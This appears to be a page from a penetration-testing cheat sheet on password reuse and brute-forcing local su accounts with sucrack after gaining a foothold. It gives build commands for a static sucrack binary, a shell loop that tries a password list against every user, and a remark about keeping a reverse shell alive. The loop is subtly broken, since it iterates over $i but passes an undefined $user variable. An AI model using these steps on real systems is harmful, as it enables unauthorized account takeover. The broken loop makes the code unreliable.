search

Password Reuse

Whenever you see a user account or a credential, then write it down and compile a users wordlist and a passwords wordlist. You can then try out all these combinations on all services you want access to.

Note: Don't use thisarrow-up-right script to bruteforce user account passwords, it sucks

hashtag
Sucrack

On linux, use sucrack. Link to static binary.arrow-up-right

Building the static binary:

# Make sure you have all the libraries you need.
# This is to get rid of the "you don't have the aclocal library" error message
autoreconf -f -i
./configure --enable-static-linking
make

Enumerating through a users and passwords list:

for i in $(cat ./users.txt); do echo "Cracking $i"; ./sucrack -u "$user" ./passwords.txt ; done

Warning: Running sucrack may break your reverse shell a bit!

PreviousDocker group/LXD groupNextBackdoors

Last updated